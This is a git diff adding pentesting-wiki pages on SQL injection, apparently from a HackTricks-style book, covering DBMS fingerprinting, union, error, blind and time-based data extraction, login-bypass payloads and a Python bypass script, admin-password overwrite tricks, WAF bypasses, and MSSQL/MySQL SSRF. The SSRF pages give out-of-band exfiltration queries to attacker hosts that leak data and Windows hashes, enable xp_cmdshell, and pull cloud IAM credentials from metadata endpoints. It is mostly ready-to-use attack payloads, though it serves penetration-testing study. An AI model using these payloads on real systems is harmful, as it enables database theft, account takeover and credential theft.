+["LNNVL(0=123)"                                    ,"ORACLE"],
+["5::int=5"                                        ,"POSTGRESQL"],
+["5::integer=5"                                    ,"POSTGRESQL"],
+["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
+["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
+["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
+["current_database()=current_database()"           ,"POSTGRESQL"],
+["sqlite_version()=sqlite_version()"               ,"SQLITE"],
+["last_insert_rowid()>1"                           ,"SQLITE"],
+["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
+["val(cvar(1))=1"                                  ,"MSACCESS"],
+["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
+["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
+["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+```
+
+Also, if you have access to the output of the query, you could make it **print the version of the database**.
+
+
+
+{% hint style="info" %}
+A continuation we are going to discuss different methods to exploit different kinds of SQL Injection. We will use MySQL as example.
+{% endhint %}
+
+## Exploiting Union Based
+
+### Detecting number of columns
+
+If you can see the output of the query this is the best way to exploit it.  
+First of all, wee need to find out the **number** of **columns** the **initial request** is returning. This is because **both queries must return the same number of columns**.  
+Two methods are typically used for this purpose:
+
+#### Order/Group by
+
+Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
+
+```text
+1' ORDER BY 1--+	#True
+1' ORDER BY 2--+	#True
+1' ORDER BY 3--+	#True
+1' ORDER BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
+```
+
+```text
+1' GROUP BY 1--+	#True
+1' GROUP BY 2--+	#True
+1' GROUP BY 3--+	#True
+1' GROUP BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
+```
+
+#### UNION SELECT
+
+Select more and more null values until the query is correct:
+
+```text
+1' UNOIN SELECT null-- - Not working
+1' UNOIN SELECT null,null-- - Not working
+1' UNOIN SELECT null,null,null-- - Worked
+```
+
+_You should use `null`values as in some cases the type of the columns of both sides of the query must be the same and null is valid in every case._
+
+### Extract database names, table names and column names
+
+On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:
+
+```text
+#Database names
+-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
+
+#Tables of a database
+-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]
+
+#Column names
+-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
+```
+
+_There is a different way to discover this data on every different database, but it's always the same methodology._ 
+
+## Exploiting Error based 
+
+If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.  
+Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
+
+```text
+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
+```
+
+## Exploiting Blind SQLi
+
+In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.  
+In this case, you can abuse that behaviour to dump the database char by char:
+
+```text
+?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
+```
+
+## Exploiting Error Blind SQLi
+
+This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not \(maybe because the HTTP server crashes\). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
+
+```text
+AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
+```
+
+## Exploiting Time Based SQLi
+
+In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
+
+```text
+1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
+```
+
+## Stacked Queries
+
+You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
+
+**Oracle** and **MySQL don't support** stacked queries. **Microsoft** and **PostgreSQL support** them: `QUERY-1-HERE; QUERY-2-HERE`
+
+## Out of band Exploitation
+
+If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
+
+```text
+select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
+```
+
+## Automated Exploitation
+
+Check the [SQLMap Cheetsheat](sqlmap.md) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
+
+## Tech specific info
+
+We have already discussed all the ways to exploit a SQLinjection vulnerability. Find some more tricks database technology dependant in this book:
+
+* [MySQL](mysql-injection/)
+* [PostgreSQL](postgresql-injection/)
+
+Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)\*\*\*\*
+
+## Authentication bypass
+
+**Small list recommended**: 
+
+{% file src="../../.gitbook/assets/sqli-authbypass-small.txt" %}
+
+**Big list recommended** list for login bypass \(please, notice that the small list is already inside the big list\):
+
+{% file src="../../.gitbook/assets/sqli-authbypass-big.txt" %}
+
+Try to inject each line of the list in the username and password at the same time.
+
+### Authentication Bypass \(Raw MD5\)
+
+When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
+
+```text
+"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
+```
+
+Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
+
+```text
+md5("ffifdyop", true) = 'or'6�]��!r,��b�
+```
+
+Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772/)
+
+### Hash Authentication Bypass
+
+```text
+admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
+```
+
+**Recomended list**: 
+
+You should use as username each line of the list and as password always: _**Pass1234.**_
+
+{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
+
+### GBK Authentication Bypass
+
+IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 \(_╘'_\)
+
+```text
+%A8%27 OR 1=1;-- 2
+%8C%A8%27 OR 1=1-- 2
+%bf' or 1=1 -- --
+```
+
+Python script:
+
+```python
+import requests
+url = "http://example.com/index.php" 
+cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3') 
+datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"} 
+r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url}) 
+print r.text
+```
+
+### Polyglot injection \(multicontext\)
+
+```text
+SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+```
+
+## Insert Statement
+
+### Modify password of existing object/user
+
+To do so you should try to **create a new object named as the "master object"** \(probably **admin** in case of users\) modifying something:
+
+* Create user named: **AdMIn** \(uppercase & lowercase letters\)
+* Create a user named: **admin=**
+* **SQL Truncation Attack** \(when there is some kind of **length limit** in the username or email\) --&gt; Create user with name: **admin          \[a lot of spaces\]           a**
+
+#### SQL Truncation Attack
+
+If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces\] a_" and any password.
+
+The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters**  \(in this case to: "_admin \[25 spaces\]_"\) and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** \(some error could appear but it doesn't means that this hasn't worked\).
+
+More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/\#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
+
+### MySQL Insert time based checking
+
+Add as much `','',''`  as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
+
+```text
+name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
+```
+
+### ON DUPLICATE KEY UPDATE
+
+ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
+
+```text
+Inject using payload:
+  attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
+
+The query would look like this:
+INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
+
+This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
+Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
+
+After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
+```
+
+### Extract information
+
+#### Creating 2 accounts at the same time
+
+When trying to create a new user and username, password and email are needed:
+
+```text
+SQLi payload:
+username=TEST&password&=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
+
+A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
+```
+
+#### Using decimal or hexadecimal
+
+With this technique you can extract information creating only 1 account. It is important to note that you don't need to comment anything.
+
+Using **hex2dec** and **substr**:
+
+```text
+'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
+```
+
+To get the text you can use:
+
+```text
+__import__('binascii').unhexlify(hex(215573607263)[2:])
+```
+
+Using **hex** and **replace** \(and **substr**\):
+
+```text
+'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
+
+'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
+
+Full ascii uppercase and lowercase replace:
+'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
+```
+
+## Routed SQL injection
+
+Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. \([Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt)\)
+
+Example:
+
+```text
+Hex of: -1' union select login,password from users-- a
+-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
+```
+
+## WAF Bypass
+
+No Space \(%20\) - bypass using whitespace alternatives
+
+```text
+?id=1%09and%091=1%09--
+?id=1%0Dand%0D1=1%0D--
+?id=1%0Cand%0C1=1%0C--
+?id=1%0Band%0B1=1%0B--
+?id=1%0Aand%0A1=1%0A--
+?id=1%A0and%A01=1%A0--
+```
+
+No Whitespace - bypass using comments
+
+```text
+?id=1/*comment*/and/**/1=1/**/--
+```
+
+No Whitespace - bypass using parenthesis
+
+```text
+?id=(1)and(1)=(1)--
+```
+
+No Comma - bypass using OFFSET, FROM and JOIN
+
+```text
+LIMIT 0,1         -> LIMIT 1 OFFSET 0
+SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
+SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
+```
+
+Blacklist using keywords - bypass using uppercase/lowercase
+
+```text
+?id=1 AND 1=1#
+?id=1 AnD 1=1#
+?id=1 aNd 1=1#
+```
+
+Blacklist using keywords case insensitive - bypass using an equivalent operator
+
+```text
+AND   -> && -> %26%26
+OR    -> || -> %7C%7C
+=     -> LIKE,REGEXP,RLIKE, not < and not >
+> X   -> not between 0 and X
+WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
+```
+
+### WAF bypass suggester tools
+
+{% embed url="https://github.com/m4ll0k/Atlas" %}
+
+
+
diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md
new file mode 100644
index 00000000..17c210c7
--- /dev/null
+++ b/pentesting-web/sql-injection/mssql-injection.md
@@ -0,0 +1,106 @@
+# MSSQL Injection
+
+## SSRF
+
+**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/\#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)\*\*\*\*
+
+\*\*\*\*[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
+
+One technique that keeps coming up is the usage of the undocumented stored procedure `xp_dirtree` that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests.
+
+If you are able to execute operating system commands, then you could invoke Powershell to make a curl \(`Invoke-WebRequest`\) request. You could do this via the hacker favorite `xp_cmdshell` as well.
+
+Alternatively, you could also use a User Defined Function in MSSQL to load a DLL and use the dll to make the request from inside MSSQL directly.
+
+Let’s look at the above techniques in a little more detail.
+
+#### Limited SSRF using master..xp\_dirtree \(and other file stored procedures\) <a id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
+
+The most common method to make a network call you will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
+
+Essentially,
+
+```text
+DECLARE @user varchar(100);
+SELECT @user = (SELECT user);  
+EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
+```
+
+Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network request to only TCP port 445. You cannot control the port number, but can read information from network shares. Addtionally, much like any UNC path access, [Windows hashes will be sent over to the network that can be captured and replayed for further exploitation](https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478).
+
+**PS:** This does not work on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` running on a `Windows Server 2016 Datacenter` in the default config.
+
+There are other stored procedures [like `master..xp_fileexist` ](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx)etc. as well that can be used for similar results.
+
+#### master..xp\_cmdshell <a id="master-xp-cmdshell"></a>
+
+The extended stored procedure [`xp_cmdshell` spawns a Windows command shell and executes the string passed to it, returning any rows of text](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql). This command is run as the SQL Server service account.
+
+`xp_cmdshell` is disabled by default. You can enable it using the SQL Server Configuration Option. Here’s how
+
+```text
+EXEC sp_configure 'show advanced options', 1
+RECONFIGURE
+GO
+EXEC sp_configure 'xp_cmdshell', 1
+RECONFIGURE
+GO
+exec master..xp_cmdshell 'whoami'
+GO
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/13.png)
+
+You could use something like [PowerCat](https://github.com/besimorhino/powercat), download the Windows port of netcat/ncat, [use raw TCP Client for arbitrary ports](https://livebook.manning.com/book/powershell-deep-dives/chapter-4/9), or simply invoke Powershell’s `Invoke-WebRequest` to make HTTP requests to perform Server Side queries.
+
+```text
+DECLARE @url varchar(max);
+SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
+exec ('master..xp_cmdshell ''powershell -exec -bypass -c ""(iwr '+@url+').Content""''');
+GO
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/14.png)
+
+You can additionally pass other headers and change the HTTP method as well to access data on services that need a POST or PUT instead of a GET like in the case of IMDSv2 for AWS or a special header like `Metadata: true` in the case of Azure or the `Metadata-Flavor: Google` for GCP.
+
+#### MSSQL User Defined Function - SQLHttp <a id="mssql-user-defined-function-sqlhttp"></a>
+
+It is fairly straightforward to write a CLR UDF \(Common Language Runtime User Defined Function - code written with any of the .NET languages and compiled into a DLL\) and load it within MSSQL for custom functions. This, however, requires `dbo` access so may not work unless the web application connection to the database as `sa` or an Administrator role.
+
+[This Github repo has the Visual Studio project and the installation instructions](https://github.com/infiniteloopltd/SQLHttp) to load the binary into MSSQL as a CLR assembly and then invoke HTTP GET requests from within MSSQL.
+
+The [`http.cs` code uses the `WebClient` class to make a GET request and fetch the content](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/) as specified
+
+```text
+using System.Data.SqlTypes;
+using System.Net;
+
+public partial class UserDefinedFunctions
+{
+    [Microsoft.SqlServer.Server.SqlFunction]
+    public static SqlString http(SqlString url)
+    {
+        var wc = new WebClient();
+        var html = wc.DownloadString(url.Value);
+        return new SqlString (html);
+    }
+}
+```
+
+In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server \(you can see the list using `select * from sys.trusted_assemblies;`\)
+
+```text
+EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
+```
+
+Once the assembly is added and the function created, we can run the following to make our HTTP requests
+
+```text
+DECLARE @url varchar(max);
+SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
+SELECT dbo.http(@url);
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/15.png)
+
diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md
new file mode 100644
index 00000000..8e652700
--- /dev/null
+++ b/pentesting-web/sql-injection/mysql-injection/README.md
@@ -0,0 +1,183 @@
+# MySQL injection
+
+**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)\*\*\*\*
+
+## Comments
+
+```sql
+-- MYSQL Comment
+# MYSQL Comment
+/* MYSQL Comment */
+/*! MYSQL Special SQL */
+/*!32302 10*/ Comment for MySQL version 3.23.02
+```
+
+## Interesting Functions
+
+### Confirm Mysql:
+
+```text
+concat('a','b')
+database()
+version()
+user()
+system_user()
+@@version
+@@datadir
+rand()
+floor(2.9)
+length(1)
+count(1)
+```
+
+### Useful functions
+
+```sql
+SELECT hex(database())
+SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
+SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
+SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
+SELECT replace(database(),"r","R")
+SELECT substr(database(),1,1)='r'
+SELECT substring(database(),1,1)=0x72
+SELECT ascii(substring(database(),1,1))=114
+SELECT database()=char(114,101,120,116,101,115,116,101,114)
+SELECT group_concat(<COLUMN>) FROM <TABLE>
+SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
+SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
+strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
+```
+
+## All injection
+
+```sql
+SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
+```
+
+from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
+
+## Flow
+
+Remember that in "modern" versions of **MySQL** you can substitute "_**information\_schema.tables**_" for "_**mysql.innodb\_table\_stats**_**"** \(This could be useful to bypass WAFs\).
+
+```sql
+SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
+SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
+SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
+SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
+```
+
+### **Only 1 value**
+
+* `group_concat()`
+* `Limit X,1`
+
+### **Blind one by one**
+
+* `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
+* `mid(version(),X,1)='5'`
+
+### **Blind adding**
+
+* `LPAD(version(),1...lenght(version()),'1')='asd'...`
+* `RPAD(version(),1...lenght(version()),'1')='asd'...`
+* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
+* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
+* `SELECT INSTR('foobarbar', 'fo...')=1`
+
+## Detect number of columns 
+
+Using a simple ORDER
+
+```text
+order by 1
+order by 2
+order by 3
+...
+order by XXX
+
+UniOn SeLect 1
+UniOn SeLect 1,2
+UniOn SeLect 1,2,3
+...
+```
+
+## MySQL Union Based
+
+```sql
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
+```
+
+## SSRF
+
+**Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
+
+## WAF bypass tricks
+
+### Information\_schema alternatives
+
+Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_ ****or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics**
+
+![](../../../.gitbook/assets/image%20%28316%29.png)
+
+![](../../../.gitbook/assets/image%20%28340%29.png)
+
+### MySQLinjection without COMMAS
+
+Select 2 columns without using any comma \([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)\):
+
+```text
+-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
+```
+
+### Retrieving values without the column name
+
+If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
+
+```bash
+# When a True is returned, you have found the number of columns
+select (select "", "") = (SELECT * from demo limit 1);     # 2columns
+select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
+```
+
+Supposing there is 2 columns \(being the first one the ID\) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
+
+```bash
+# When True, you found the correct char and can start ruteforcing the next position
+select (select 1, 'flaf') = (SELECT * from demo limit 1);
+```
+
+More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
+
+### MySQL history
+
+You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis**
+
+### Version alternative**s**
+
+```text
+mysql> select @@innodb_version;
++------------------+
+| @@innodb_version |
++------------------+
+| 5.6.31           |
++------------------+
+
+mysql> select @@version;
++-------------------------+
+| @@version               |
++-------------------------+
+| 5.6.31-0ubuntu0.15.10.1 |
++-------------------------+
+
+mysql> mysql> select version();
++-------------------------+
+| version()               |
++-------------------------+
+| 5.6.31-0ubuntu0.15.10.1 |
++-------------------------+
+```
+
diff --git a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
new file mode 100644
index 00000000..83fd0161
--- /dev/null
+++ b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -0,0 +1,62 @@
+# Mysql SSRF
+
+**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/\#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)\*\*\*\*
+
+### Using LOAD\_FILE/LOAD DATA/LOAD XML
+
+Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
+
+For example, if the `secure_file_priv` global variable was not set, the [default value is set to `/var/lib/mysql-files/`](https://dev.mysql.com/doc/mysql-installation-excerpt/5.7/en/linux-installation-rpm.html), which means that you can only use functions like `LOAD_FILE('filename')` or `LOAD DATA [LOCAL] INFILE 'filename' INTO TABLE tablename` to read files from the `/var/lib/mysql-files/` directory. To be able to perform reads on files outside this directory, the `secure_file_priv` option has to be set to `""` which can only be done by updating the database configuration file or by passing the `--secure_file_priv=""` as a startup parameter to the database service.
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/2.png)
+
+Nevertheless, under circumstances where `secure_file_priv` is set to `""`, we should be able to read other files on the system, assuming file read perms and `file_priv` is set to `Y` in `mysql.user` for current database user. However, being able to use these functions to make network calls is very operating system dependent. As these functions are built only to read files, the only network relevant calls that can be made are to UNC paths on Windows hosts as the [Windows `CreateFileA` api that is called when accessing a file understands UNC naming conventions](https://docs.microsoft.com/en-gb/windows/win32/fileio/naming-a-file).
+
+So if your target database is running on a Windows machine the injection query `x'; SELECT LOAD_FILE('\\\\attackerserver.example.com\\a.txt'); -- //` would [result in the Windows machine sending out NTLMv2 hashes in an attempt to authenticate with the attacker controlled `\\attackerserver.example.com`](https://packetstormsecurity.com/files/140832/MySQL-OOB-Hacking.html).
+
+This Server Side Request Forgery, although useful, is restricted to only TCP port 445. You cannot control the port number, but can read information from shares setup with full read privs. Also, as has been shown with older research, you can use this limited SSRF capability to steal hashes and relay them to get shells, so it’s definitely useful.
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/3.png)
+
+### Using User Defined Functions
+
+Another cool technique with MySQL databases is the ability to use User Defined Functions \(UDF\) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.
+
+You could use a SQL Injection to write a library \(`.so` or `.dll` depending on Linux or Windows\), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
+
+This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the `plugin_dir` variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
+
+Basically for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need the
+
+* ability to write to the location specified in `@@plugin_dir` via SQL Injection
+* `file_priv` set to `Y` in `mysql.user` for the current database user
+* `secure_file_priv` set to `""` so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
+
+Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib_mysqludf_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
+
+`x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
+
+There are a lot of other functions declared in this library, an analysis of which can be seen [here](https://osandamalith.com/2018/02/11/mysql-udf-exploitation/). If you are lazy like me, you can grab a copy of this UDF library, for the target OS, from a metasploit installation from the `/usr/share/metasploit-framework/data/exploits/mysql/` directory and get going.
+
+Alternatively, UDF libraries have been created to specifically provide the database the ability to make HTTP requests. You can use [MySQL User-defined function \(UDF\) for HTTP GET/POST](https://github.com/y-ken/mysql-udf-http) to get the database to make HTTP requests, using the following syntax
+
+`x'; SELECT http_get('http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
+
